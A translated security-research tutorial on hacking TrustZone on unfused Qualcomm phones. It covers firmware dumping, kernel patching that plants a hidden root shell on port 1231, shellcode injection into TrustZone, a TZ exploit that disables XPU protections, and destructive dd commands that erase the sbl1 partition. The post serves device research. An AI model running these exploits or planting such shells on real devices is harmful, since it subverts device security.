Original title: Bring Light To The Darkness P3
Original URL: https://bkerler.github.io/2020/08/03/bring-light-to-the-darkness-p3/
This is a translated article; please point out anything that was translated incorrectly.
Setting up a debuggable Qualcomm TrustZone (Aarch64) environment
Introduction
- Set up a TrustZone debugging environment on a phone whose secure boot has not been fused, and start hacking
- Works for both end-user devices and development boards; in the end we get full control from EL0 through EL3
- Unfused (secure boot; presumably meaning not locked), using MSM8974, MSM8976, MSM8953, MSM8937 and similar chips, as well as phones based on Qualcomm X6, X8 or X9 modems; here I use the BQ X Pro and the OnePlus One
- Python 3.x installed (Linux)
1. Verify whether the device is vulnerable to cold patching
1.1 Install the latest adb and fastboot
~ $ mkdir ~/bin
~ $ cd ~/bin
~/bin $ wget https://dl.google.com/android/repository/platform-tools-latest-linux.zip; unzip platform-tools-latest-linux.zip; rm platform-tools-latest-linux.zip
~/bin $ cd ..
After adding the directory to your PATH and rebooting, adb should be available.
1.2 Install my Qualcomm Emergency Download (EDL) tool
~ $ git clone https://github.com/bkerler/EDL edl
~ $ cd edl
~/edl $ python3 -m pip install pyusb pyserial
~/edl $ sudo sh -c 'echo "blacklist qcserial" >> /etc/modprobe.d/blacklist.conf'
~/edl $ sudo cp Drivers/51-edl.rules /etc/udev/rules.d
~/edl $ sudo cp Drivers/50-android.rules /etc/udev/rules.d
~/edl $ sudo udevadm control -R
1.3 Extract the EDL loader matching your device from the firmware (?), place it into the Loaders directory and name it [msmid]_[pkhash 8 bytes].bin, or simply use the fhloaderparse.py script
In practice, go to the Loaders directory at https://github.com/bkerler/EDL, find the bin file matching your phone and copy it into Loaders
For example, copy the BQ X Pro loader directly:
~/edl $ cp 000460E100000000_cc3153a80293939b_FHPRG_bqXPro.bin Loaders
For example, copy the OnePlus One loader directly:
~/edl $ cp 007BC0E100000000_cc3153a80293939b_FHPRG_OnePlusOne.bin Loaders
Example of using the fhloaderparse script:
~/edl $ mkdir test
~/edl $ cp emmc_prog_firehose.bin test
~/edl $ ./fhloaderparse.py test
1.4 Power the phone off, then hold Volume+ and Volume- together and connect USB; the phone then enters 9008 mode (many devices sold in China cannot enter it this way; the fastest route is to open the device and short the test point)
1.5 Use the Qualcomm firmware cold patch tool to verify whether the device is vulnerable
~/edl $ ./edl.py -secureboot
Qualcomm Sahara / Firehose Client (c) B.Kerler 2018-2019.
__main__ - Trying with loaders in Loader directory ...
__main__ - Waiting for the device
__main__ - Device detected :)
__main__ - Mode detected: sahara
Device is in EDL mode .. continuing.
Library.sahara -
------------------------
HWID: 0x007bc0e100000000 (MSM_ID:0x007bc0e1,OEM_ID:0x0000,MODEL_ID:0x0000)
PK_HASH: 0xcc3153a80293939b90d02d3bf8b23e0292e452fef662c74998421adad42a380f
Serial: 0x0d7e015b
SBL Version: 0x00000000
Library.sahara - Unfused device detected, so any loader should be fine...
Library.sahara - Trying loader: Loaders/qualcomm/007BC0E100000000_cc3153a80293939b_FHPRG_OnePlusOne.bin
Successfully uploaded programmer :)
Library.firehose - TargetName=MSM8974
Library.firehose - MemoryName=eMMC
Library.firehose - Version=1
Library.firehose - Peek: Address(0xfc4b83f8),Size(0x4)
Progress: |██████████████████████████████████████████████████| 100.0% Complete
Sec_Boot0 PKHash-Index:0 OEM_PKHash: False Auth_Enabled: False Use_Serial: False
Sec_Boot1 PKHash-Index:0 OEM_PKHash: False Auth_Enabled: False Use_Serial: False
Sec_Boot2 PKHash-Index:0 OEM_PKHash: False Auth_Enabled: False Use_Serial: False
Sec_Boot3 PKHash-Index:0 OEM_PKHash: False Auth_Enabled: False Use_Serial: False
Secure boot disabled.
If the last line shows Secure boot disabled, the device can be patched and hacked.
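As an added example (not part of the original post or of the EDL tool), the following Python code parses the text that the secure-boot check above prints, derives the [msmid]_[pkhash 8 bytes] loader name prefix that step 1.3 asks for, and reports whether the fuse state leaves the device exposed to cold patching. The unfused sample is built from the output shown on the page; the fused sample and its values are constructed, and the parse fails closed (reports "not exposed") when no Sec_Boot line can be read.

```python
import re

# Constructed sample: the unfused OnePlus One output shown on the page.
SAMPLE_UNFUSED = """\
HWID: 0x007bc0e100000000 (MSM_ID:0x007bc0e1,OEM_ID:0x0000,MODEL_ID:0x0000)
PK_HASH: 0xcc3153a80293939b90d02d3bf8b23e0292e452fef662c74998421adad42a380f
Serial: 0x0d7e015b
Sec_Boot0 PKHash-Index:0 OEM_PKHash: False Auth_Enabled: False Use_Serial: False
Sec_Boot1 PKHash-Index:0 OEM_PKHash: False Auth_Enabled: False Use_Serial: False
Sec_Boot2 PKHash-Index:0 OEM_PKHash: False Auth_Enabled: False Use_Serial: False
Sec_Boot3 PKHash-Index:0 OEM_PKHash: False Auth_Enabled: False Use_Serial: False
Secure boot disabled.
"""

# Constructed counter-example (hypothetical values, same line format): what a
# production-fused device would report.
SAMPLE_FUSED = """\
HWID: 0x000460e100000000 (MSM_ID:0x000460e1,OEM_ID:0x0000,MODEL_ID:0x0000)
PK_HASH: 0x1111111111111111222222222222222233333333333333334444444444444444
Sec_Boot0 PKHash-Index:1 OEM_PKHash: True Auth_Enabled: True Use_Serial: False
Sec_Boot1 PKHash-Index:1 OEM_PKHash: True Auth_Enabled: True Use_Serial: False
Secure boot enabled.
"""

HWID_RE = re.compile(r"HWID:\s*0x([0-9a-fA-F]{16})")
PKHASH_RE = re.compile(r"PK_HASH:\s*0x([0-9a-fA-F]{64})")
SECBOOT_RE = re.compile(
    r"Sec_Boot(\d+)\s+PKHash-Index:(\d+)\s+OEM_PKHash:\s*(True|False)"
    r"\s+Auth_Enabled:\s*(True|False)\s+Use_Serial:\s*(True|False)")


def parse_secboot(text):
    """Parse the check's output into hwid, pk_hash and one dict per Sec_Boot register."""
    hwid = HWID_RE.search(text)
    pkh = PKHASH_RE.search(text)
    regs = []
    for m in SECBOOT_RE.finditer(text):
        regs.append({
            "index": int(m.group(1)),
            "pkhash_index": int(m.group(2)),
            "oem_pkhash": m.group(3) == "True",
            "auth_enabled": m.group(4) == "True",
            "use_serial": m.group(5) == "True",
        })
    return {
        "hwid": hwid.group(1).upper() if hwid else None,
        "pk_hash": pkh.group(1).lower() if pkh else None,
        "sec_boot": regs,
    }


def loader_prefix(info):
    """Loader file name prefix used in the Loaders directory: [msmid]_[first 8 bytes of pkhash]."""
    if not info["hwid"] or not info["pk_hash"]:
        return None
    return f"{info['hwid']}_{info['pk_hash'][:16]}"


def cold_patch_exposed(info):
    """True when the fuses were read and no Sec_Boot register enforces authentication.

    An empty register list means the output could not be parsed; that is
    reported as not exposed (unknown), never as "secure boot disabled".
    """
    regs = info["sec_boot"]
    if not regs:
        return False
    return not any(r["auth_enabled"] for r in regs)


def assess(text):
    """Return a short verdict dict for one run of the check."""
    info = parse_secboot(text)
    return {
        "loader_prefix": loader_prefix(info),
        "registers_read": len(info["sec_boot"]),
        "exposed": cold_patch_exposed(info),
    }


if __name__ == "__main__":
    print(assess(SAMPLE_UNFUSED))
    print(assess(SAMPLE_FUSED))
```

Feeding the real command output into assess() gives the same verdict the tool prints, plus the loader name prefix to look for in Loaders; a device whose registers all report Auth_Enabled: True is fused and the rest of this post does not apply to it.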
2. Obtain the device firmware
2.1 Dump it directly from the device
Dump the boot, aboot and tz partitions (note: this is done in 9008 mode)
~/edl $ ./edl.py -r boot boot.img
Qualcomm Sahara / Firehose Client (c) B.Kerler 2018-2019.
__main__ - Trying with loaders in Loader directory ...
__main__ - Waiting for the device
__main__ - Device detected :)
__main__ - Mode detected: firehose
Library.firehose - TargetName=MSM8974
Library.firehose - MemoryName=eMMC
Library.firehose - Version=1
Library.firehose -
Reading from physical partition 0, sector 196608, sectors 32768
Progress: |██████████████████████████████████████████████████| 100.0% Complete
Dumped sector 196608 with sector count 32768 as boot.img.
If it prints main - USB desync, please rerun command !, simply run the command again
~/edl $ ./edl.py -r aboot aboot.img
~/edl $ ./edl.py -r tz tz.img
Then go back up to the parent directory of edl
~/edl $ cd ..
Alternatively, download the official firmware (factory image?) and attack that
For example, for the 64-bit BQ Aquaris X Pro MSM8953: 2.7.2_20190620-1410-bardockpro_bq-user-2169-Fastboot-FW.zip, at the following address (no longer available)
https://storage.googleapis.com/otas/2017/Smartphones/Bardock_Pro/OTA_Official/Oreo/2.7.2/2.7.2_20190620-1410-bardockpro_bq-user-2169-Fastboot-FW.zip
For the 32-bit OnePlus One MSM8974: cm-13.1.2-ZNH2KAS3P0-bacon-signed-fastboot.zip, at the following address (still available)
https://www.androidfilehost.com/?fid=24591000424960109
3. Download and install my Qualcomm attack tools
3.1 Get the latest version from GitHub
~ $ git clone https://github.com/bkerler/qcpatchtools
~ $ cd qcpatchtools
3.2 Install the capstone and keystone engines
~/qcpatchtools $ git clone https://github.com/keystone-engine/keystone --recursive
~/qcpatchtools $ cd keystone && mkdir -p build && cd build && cmake ..
~/qcpatchtools/keystone $ ../make-lib.sh
~/qcpatchtools/keystone $ sudo make install
~/qcpatchtools/keystone $ cd bindings/python
~/qcpatchtools/keystone/bindings/python $ sudo python3 setup.py build install
~/qcpatchtools/keystone/bindings/python $ cd ~/qcpatchtools
~/qcpatchtools $ rm -rf keystone
~/qcpatchtools $ git clone https://github.com/aquynh/capstone --recursive
~/qcpatchtools $ cd capstone
~/qcpatchtools/capstone $ ./make.sh
~/qcpatchtools/capstone $ sudo ./make.sh install
~/qcpatchtools/capstone $ cd bindings/python
~/qcpatchtools/capstone/bindings/python $ sudo python3 setup.py build install
~/qcpatchtools/capstone/bindings/python $ cd ~/qcpatchtools
~/qcpatchtools $ rm -rf capstone
3.3 Install the required third-party packages
~/qcpatchtools $ sudo pip3 install -r requirements.txt
3.4 You can now leave the qcpatchtools directory
~/qcpatchtools $ cd ~
4. Patch the (base) kernel
Example: the 64-bit BQ Aquaris X Pro MSM8953
4.1 Download the kernel source matching the phone and build it
~ $ git clone https://github.com/bq/aquaris-X-Pro.git
~ $ mv aquaris-X-Pro kernel
~ $ cd kernel
~/kernel $ git checkout tags/2.5.1_20190114-1551
~/kernel $ cd ..
~ $ git clone https://android.googlesource.com/platform/prebuilts/gcc/linux-x86/aarch64/aarch64-linux-android-4.9
~ $ cd aarch64-linux-android-4.9
~/aarch64-linux-android-4.9 $ git checkout 22f053ccdfd0d73aafcceff3419a5fe3c01e878b
~/aarch64-linux-android-4.9 $ cd ..
~ $ mkdir KERNEL_OUT
4.2 Apply my patch, which adds a custom svc handler (see Gal Beniamini's blog), removes the xpu restrictions and adds extra logging of tz svc calls (i.e. apply the patch to the kernel tree with the command below)
~ $ patch -p1 -d kernel < qcpatchtools/patches/kernel_bq_msm8953.diff
4.3 Build the custom kernel
~ $ make -C kernel O=../KERNEL_OUT ARCH=arm64 CROSS_COMPILE=../aarch64-linux-android-4.9/bin/aarch64-linux-android- bardockpro_defconfig
~ $ make -j4 O=../KERNEL_OUT/ -C kernel ARCH=arm64 CROSS_COMPILE=../aarch64-linux-android-4.9/bin/aarch64-linux-android-
~ $ cp KERNEL_OUT/arch/arm64/boot/Image.gz-dtb zkernel
Example: the 32-bit OnePlus One MSM8974 (the steps are basically the same as above; only the commands differ slightly)
4.1 Build the official kernel
~ $ git clone https://github.com/LineageOS/android_kernel_oneplus_msm8974 -b cm-13.0 kernel
~ $ git clone https://android.googlesource.com/platform/prebuilts/gcc/linux-x86/arm/arm-linux-androideabi-4.9
~ $ cd arm-linux-androideabi-4.9
~/arm-linux-androideabi-4.9 $ git checkout 10ddded24ecdbdeaa4ac57d49962ca06e9c1ceaa
~/arm-linux-androideabi-4.9 $ cd ..
~ $ mkdir KERNEL_OUT
4.2 Patch the kernel with my tool
~ $ patch -p1 -d kernel < qcpatchtools/patches/kernel_oneplus_msm8974.diff
4.3 Build the custom kernel
~ $ make -C kernel O=../KERNEL_OUT ARCH=arm CROSS_COMPILE=../arm-linux-androideabi-4.9/bin/arm-linux-androideabi- cyanogenmod_bacon_defconfig
~ $ make -j4 O=../KERNEL_OUT/ -C kernel ARCH=arm CROSS_COMPILE=../arm-linux-androideabi-4.9/bin/arm-linux-androideabi-
~ $ cp KERNEL_OUT/arch/arm/boot/zImage zkernel
zImage-dtb is not copied here because the OnePlus is different: it uses a modified dtb, which has already been extracted from the boot image
5. Root the (base) kernel
To get my own rooted kernel, I used my Android_Universal tool and the EDL script on a locked retail BQ X Pro to enable tz debugging over adb, and then added a custom reverse shell
5.1 Install the android_universal toolset
~ $ git clone https://github.com/bkerler/android_universal
5.2 Root the storage partition, then add a fake Root of Trust to pass AVBv1 verification
~ $ cd edl
~/edl $ cp boot.img ../android_universal
~/edl $ cd ~/android_universal
For the 32-bit OnePlus One MSM8974
The OnePlus One is signed with Google's test loaders, so boot.img.signed can be flashed directly
~/android_universal $ ./makeramdisk.sh -fn boot.img -c -fs 1
For the 64-bit BQ Aquaris X Pro MSM8953
Since MSM8953-family devices use Android Verified Boot v1 (AVBv1), boot.img.rotfake must be flashed instead
~/android_universal $ ./makeramdisk.sh -fn boot.img -c
5.3 makeramdisk pauses (waiting for you to add custom files to the boot image); open a new terminal and run the following
~/android_universal $ cp ../zkernel tmp/kernel
~/android_universal $ cd ..
Then return to the makeramdisk terminal and press Enter; it packs and signs the boot image
6. Prepare the tz shellcode for code injection (cold patch or hot patch)
6.1 Save the appropriate shellcode into shellcode.txt
For the 32-bit OnePlus One MSM8974
# R0 = writeflag (0=read, 0x22=write), R1=addr, R2=value, R3=readmemptr
PUSH {R4-R6,LR}
CMP R0, #0x22
BEQ write
LDR R0, [R1]
STR R0, [R3]
B exit
write:
STR R2, [R1]
exit:
POP {R4-R6,PC}
For the 64-bit BQ Aquaris X Pro MSM8953
# X0 = writeflag (0=read, 0x22=write), X1=addr, X2=value
STP X28, X27, [SP,#-0x60]!
STP X26, X25, [SP,#0x10]
STP X24, X23, [SP,#0x20]
STP X22, X21, [SP,#0x30]
STP X20, X19, [SP,#0x40]
STP X29, X30, [SP,#0x50]
MOV X29, SP
# Value of arg0 0x22 means write dword from arg2 to address arg1,
# Value of arg0 0x0 means read dword from address arg1
CMP W0, #0x22
BEQ write
LDR W0, [X1]
B exit
write:
STR W2, [X1]
exit:
LDP X29, X30, [SP,#0x50]
LDP X20, X19, [SP,#0x40]
LDP X22, X21, [SP,#0x30]
LDP X24, X23, [SP,#0x20]
LDP X26, X25, [SP,#0x10]
LDP X28, X27, [SP],#0x60
RET
7. Patch tz with the shellcode above so that we can inject code
7.1 Patch the shellcode into an empty area of tz (i.e. store the shellcode in an unused code cave)
For the 32-bit OnePlus One MSM8974
~/qcpatchtools $ ./tz_coldpatch32.py -in tz.mbn -out tz.patched -sc shellcode.txt
Found svc_entry_offset: 0xfe826104.
Possible code cave at 0xfe809c8d, file offset: 0x30b8c
svc code: 0x0C06 (svc 0x03 cmd 0x06)
Code to patch:70b5222802d00868106000e00a6070bd
Patching done, saved as tz.patched
For the 64-bit BQ Aquaris X Pro MSM8953
~/qcpatchtools $ ./tz_coldpatch64.py -in ../edl/tz.img -out tz.img.patched -sc shellcode.txt
Found code cave at 0x8657871c, file offset: 0x5c71c, svc code: 0x0200020D
Code to patch:1f88007160000054200040b9c0035fd6220000b9c0035fd6
Patching done, saved as tz.img.patched
7.2 Sign the patched tz with a custom private key
~/qcpatchtools $ ./qc_signer.py -t qsee -in tz.img.patched -out tz.signed
8. Patch aboot to allow a custom ramdisk
Only needed on devices with AVB verification; for the OnePlus MSM8974 this can be skipped
8.1 Patch aboot
For the 32-bit OnePlus One MSM8974
- Nothing to do
For the 64-bit BQ Aquaris X Pro MSM8953
First patch aboot to bypass verification
~/qcpatchtools $ ./aboot_rot64.py -in ../edl/aboot.img -out aboot.patched
Then sign the patched aboot
~/qcpatchtools $ ./qc_signer.py -in aboot.patched -out aboot.signed -t appsbl
~/qcpatchtools $ rm aboot.patched
9. Flash the modified files
For the 32-bit OnePlus One MSM8974
9.1 Copy the boot and tz images into the EDL directory
~/qcpatchtools $ cp tz.signed ../edl/
~/qcpatchtools $ cd ..
~ $ cp android_universal/boot.img.signed edl/
9.2 Power off, hold Volume+ and Volume- together to enter 9008 mode (as noted above, shorting the test point is the easiest way on devices sold in China), then flash boot and tz
~ $ cd edl/
~/edl $ ./edl.py -w boot boot.img.signed
~/edl $ ./edl.py -w tz tz.signed
9.3 Reboot the phone
For the 64-bit BQ Aquaris X Pro MSM8953
9.1 Likewise copy boot and tz into the EDL directory
~/edl $ cd ~
~ $ cp qcpatchtools/aboot.signed qcpatchtools/tz.signed edl/
~ $ cp android_universal/boot.rotfake edl/
~ $ cd edl
9.2 Flash aboot, boot and tz
~/edl $ ./edl.py -w boot boot.rotfake
~/edl $ ./edl.py -w aboot aboot.signed
~/edl $ ./edl.py -w tz tz.signed
~/edl $ cd ..
9.3 If the phone reboots into usb pid 0x900E or 0x9006 mode, open the device, remove the battery, disconnect USB, ground the emmc clk pin, reconnect USB, release the ground and put the battery back. The phone then enters 9008 normally and you can flash away
9.4 Reboot the phone
10. Test whether the device (kernel) was rooted successfully
10.1 If flashing TZ failed
Case one: the device stays in 0x9006 mode; unbrick it as follows
First run the following command
~/edl $ ./edl.py -vid 0x05c6 -pid 0x9006
The device now shows up as a block device (mounted?); to unbrick it you have to flash a working tz, so back up the sbl1 partition and then erase it
~/edl $ dd if=/dev/disk/by-part-label/sbl1 of=sbl1.bin
~/edl $ dd if=/dev/zero of=/dev/disk/by-part-label/sbl1
Then switch to 9008 mode and write a working sbl1 and tz image
~/edl $ ./edl.py -w sbl1 sbl1.img
~/edl $ ./edl.py -w tz tz.img
Copy the custom adb key
~ $ cd ../android_universal
~/android_universal $ ./install_adb_key.sh
Case two: the device stays in 0x900E mode
This shows as the device not booting and a red LED (breathing light?), meaning the image signature is wrong; you need to short the DAT0 and GND pins while powering on (without the battery), enter 9008 mode, put the battery back and reflash the firmware with edl
~/edl $ ./edl.py -w tz tz.img
10.2 Copy the custom adb key
~ $ cd ../android_universal
~/android_universal $ ./install_adb_key.sh
- To get a root shell, first connect over tcp to port 1231 on the device to reach the hidden root shell; there is no prompt after connecting, just type a command and press Enter
$ adb shell
bardock-pro:/ $ toybox nc 0.0.0.0 1231
root@bardock:/ # id
uid=0(root) gid=0(root) groups=0(root) context=u:r:su:s0
root@bardock:/ # uname -a
Linux localhost 3.18.71-perf-g18b9c9b33ae-dirty #1 SMP PREEMPT Tue Feb 26 14:18:30 CET 2019 aarch64
root@bardock:/ # getprop | grep 8.1
[net.tcp.buffersize.lte]: [2097152,4194304,8388608,262144,524288,1048576]
[net.tcp.buffersize.wifi]: [524288,2097152,4194304,262144,524288,1048576]
[ril.ecclist]: [911,112,*911,#911,000,08,110,999,118,119,122]
[ril.ecclist1]: [911,112,*911,#911,000,08,110,999,118,119]
[ro.bootimage.build.fingerprint]: [bq/bardock-pro/bardock-pro:8.1.0/OPM1.171019.026/1492:user/release-keys]
[ro.boottime.adbd]: [5047811195]
[ro.boottime.cnd]: [6851364840]
[ro.boottime.cnss-daemon]: [6891754944]
[ro.boottime.keystore]: [6871139580]
[ro.boottime.mediadrm]: [6872873851]
[ro.boottime.nfc_hal_service]: [4955175831]
[ro.boottime.nvtool]: [6861805830]
[ro.boottime.nxpnfc_hal_svc]: [4962930831]
[ro.boottime.ril-daemon]: [6887123642]
[ro.boottime.storaged]: [6882149788]
[ro.boottime.time_daemon]: [6853684111]
[ro.boottime.tombstoned]: [6930821819]
[ro.boottime.vndservicemanager]: [4090654841]
[ro.build.description]: [bardockpro_bq-user 8.1.0 OPM1.171019.026 1492 release-keys]
[ro.build.fingerprint]: [bq/bardock-pro/bardock-pro:8.1.0/OPM1.171019.026/1492:user/release-keys]
[ro.build.version.base_os]: [bq/bardock-pro/bardock-pro:8.1.0/OPM1.171019.026/1422:user/release-keys]
[ro.build.version.release]: [8.1.0]
[ro.com.google.gmsversion]: [8.1_201810]
11. Talk to tz (read tz memory)
For the 32-bit OnePlus One MSM8974
Example of reading a dword from tz memory (address -> 0xFE82CDA0)
$ adb forward tcp:1231 tcp:1231
$ adb push qcxploit /data/local/tmp
$ nc localhost 1231
root@bacon:/ # cd /data/local/tmp
root@bacon:/data/local/tmp # ./qcxploit exploit8974
root@bacon:/data/local/tmp # ./qcxploit readmem 0xFE82CDA0 4
0xFE805738
385780FE
For the 64-bit BQ Aquaris X Pro MSM8953
Example of reading a dword from tz memory (address -> 0x8657871c)
$ adb forward tcp:1231 tcp:1231
$ adb push qcxploit /data/local/tmp
$ nc localhost 1231
root@bardock:/ # cd /data/local/tmp
root@bardock:/data/local/tmp # ./qcxploit readmem 8657871c 4
Sending SVC: 0x200020d
Data:
0xA9BA6FFC
FC6FBAA9
12. How to patch tz (write instructions into the empty area)
For the 32-bit OnePlus One MSM8974
12.1 Disable XPU
root@bacon:/ # /data/local/tmp/qcxploit svcreg32 03 06 03 0x22 0xFC48B080 0x0
Sending SVC: 0x10, CMD: 0x2
IOCTL RES: 0x0000001E
root@bacon:/ # /data/local/tmp/qcxploit exploit8974
MSM8974 TZ 0-day exploit by B.Kerler 2017
----------------------------------------------------------
Disable NS Blacklist
Zeroing out IMEM
Refreshing NS Blacklist
Done exploiting
12.2 Read and write
- Read a dword
root@bacon:/ # /data/local/tmp/qcxploit svcreg32 03 06 03 0x0 0x[addr_to_read] 0x[bufferaddr]
- Write a dword
root@bacon:/ # /data/local/tmp/qcxploit svcreg32 03 06 03 0x22 0x[addr_to_write] 0x[value_to_write]
- Read after disabling XPU
root@bacon:/ # /data/local/tmp/qcxploit readmem [addr_to_read] [length_to_read]
- Write after disabling XPU
root@bacon:/ # /data/local/tmp/qcxploit writemem [addr_to_write] [value_to_write_as_hexstring]
12.3 Generate the shellcode
~/qcpatchtools $ ./Tools/asmtools.py -asm arm,thumb -in ShellCode/shellcode_examples/read_write_shellcode_arm.txt
CPU: arm, MODE: thumb
70b5222802d00868106000e00a6070bd
12.4 Inject the shellcode (0xfe809c8d is the code cave address from section 7.1)
root@bacon:/data/local/tmp # ./qcxploit writemem FE809C8D 70b5222802d00868106000e00a6070bd
12.5 Run the injected shellcode
root@bacon:/data/local/tmp # ./qcxploit svcreg32 06 03 03 0 0xFE808796 0xFE82830c
Sending SVC: 0xc, CMD: 0xe
IOCTL RES: 0x0000003E
root@bacon:/data/local/tmp # ./qcxploit readmem 0xFE82830C 4
Memory read:
70B5042B
12.6 If execution raises an exception, check /d/tzdbg/log
For the 64-bit BQ Aquaris X Pro MSM8953
12.1 Disable XPU
Disable HWIO_BIMC_S_DDR0_XPU_SCR_ADDR; optional, but it disables the tz key
root@bardock:/ # ./qcxploit svcreg 200020D 4 22 44a000 13f 0
Disable HWIO_BIMC_S_DDR0_XPU_CR_ADDR
root@bardock:/ # ./qcxploit svcreg 200020D 4 22 44a080 19e 0
Disable HWIO_OCIMEM_MPU_XPU_SCR_ADDR; optional, but it disables the tz key
root@bardock:/ # ./qcxploit svcreg 200020D 4 22 53000 13f 0
Disable HWIO_OCIMEM_MPU_XPU_CR_ADDR
root@bardock:/ # ./qcxploit svcreg 200020D 4 22 53080 11f 0
Disable write protection by changing the protected memory region: not the address where the tz code starts, but the address where it ends (write 0x866f0000 to HWIO_BIMC_S_DDR0_XPU_PRT2_START0_ADDR); this is a tz bug
root@bardock:/ # ./qcxploit svcreg 200020D 4 22 44a340 866f0000 0
12.2 Enable the tz debug log
root@bardock:/ # mount -t debugfs debugfs /d/
root@bardock:/ # ls /d/tzdbg
12.3 Now any code can be uploaded into tz with devmem; here, writing to tz via svc cmd 0x200030F is used as the example
root@bardock:/ # ./busybox devmem 0x865ef918
root@bardock:/ # ./busybox devmem 0x865ef918 32 0x865630fc
root@bardock:/ # ./busybox devmem 0x865ef918 32 0x86572214
root@bardock:/ # ./busybox devmem 0x8657221C 32 0xD2800000
root@bardock:/ # ./qcxploit svcreg 200030F 4 0 53000 13e 0
Great article!! Pity I can't follow it.